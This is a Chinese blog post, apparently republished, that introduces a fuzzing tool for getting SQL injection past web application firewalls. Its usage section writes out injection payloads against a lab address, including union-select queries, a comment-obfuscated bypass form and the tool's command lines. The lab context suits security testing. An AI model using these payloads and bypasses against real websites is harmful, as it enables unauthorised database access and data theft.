sql注入bypass waf工具(1月18日更新)
2023-1-21 08:6:24 Author: Web安全工具库(查看原文) 阅读量:30 收藏

===================================

免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

0x01 工具介绍

sql_Bypass_WAF是一款sql注入绕waf工具,通过fuzz的方式,进行大量测试找到bypass语句。

0x02 安装与使用

1、-h查看参数帮助

2、先判断出waf拦截的sql恶意语句。

3、再将想要Bypass的语句带入到工具中,注意带入到工具中的url为waf拦截的url。

如果bypass一个参数,用"~"进行包裹,如

http://192.168.170.133/sqli/less-1/?id=1' and 1=1 --+将"and"用~包裹后:http://192.168.170.133/sqli/less-1/?id=1' ~and~ 1=1 --+

命令示例:

sql_Bypass_WAF.exe -s "http://192.168.170.133/sqli/less-1/?id=1' ~and~ 1=1 --+"

如果为两个参数,在两个参数中间加"^",如

http://192.168.170.133/sqli/less-1/?id=1' order by 1 --+"order by"用^指定http://192.168.170.133/sqli/less-1/?id=1' order^by 1 --+

命令示例:

sql_Bypass_WAF.exe -s "http://192.168.170.133/sqli/less-1/?id=1' order^by 1 --+"

暂不支持超过两个参数的fuzz,但可以拆分依次带入测试,如:

测试语句:

http://192.168.170.133/sqli/less-1/?id=-1' union select 1,database(),3 --+先bypass"union select"http://192.168.170.133/sqli/less-1/?id=-1' union^select 1,2,3 --+bypass后语句:http://192.168.170.133/sqli/less-1/?id=-1' union/*////%//select 1,2,3 --+再bypass"database()"http://192.168.170.133/sqli/less-1/?id=-1' union/*////%//select 1,database^(),3 --+

0x03 项目链接下载

1、通过阅读原文,到项目地址下载

2、关注公众号web安全工具库,后台回复:工具666

3、每日抽奖送书

· 推 荐 阅 读 ·

本书以图解的方式讲述数据结构及其算法,力求简洁明了地阐述复杂的算法理论,以C作为描述语言解析算法的执行过程,以大量的范例程序来展示数据结构的使用及其相关算法的具体实现。


文章来源: http://mp.weixin.qq.com/s?__biz=MzI4MDQ5MjY1Mg==&mid=2247507276&idx=1&sn=78c444c06ae590964f853a151545275f&chksm=ebb5324fdcc2bb598361c4e0a98eb8d05f1ccc5e24f0c5b6718e9d32535426fe3f03cb844619#rd
如有侵权请联系:admin#unsafe.sh